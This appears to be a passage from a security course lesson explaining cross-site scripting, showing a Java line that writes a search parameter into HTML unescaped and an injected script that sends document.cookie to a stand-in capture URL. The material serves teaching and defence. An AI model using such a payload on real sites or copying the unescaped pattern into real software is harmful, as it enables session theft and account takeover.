Cross-Site Scripting
Learn about cross-site scripting, server-side rendering, automated scanning tools, and some ways to protect privileged data.
We'll cover the following...
What is XSS?
Cross-site scripting (XSS) happens when a service renders a user’s input directly into HTML without applying input escaping. It’s related to injection attacks. Both take advantage of the fact that we represent structured data as sequences of ordinary characters by providing premature delimiters and unwanted commands. For example, suppose we have a service that echoes back the user’s “search” parameter in the results page. It has some server-side rendering code like this:
String queryBox = "<input type='text' value='" + request.getParameter("search") + // XSS happens here. "' />";
An attacker can run a search with this nasty little query string (wrapped to fit the page):
'><script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'
After the server inserts that string, the resulting HTML looks like this (wrapped to fit the page):
<input type='text' value=''> <script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'' />
Server-side rendering
This is malformed HTML to be sure, but browsers are pretty lenient about that. When the client’s browser hits the script tag in the middle, it ...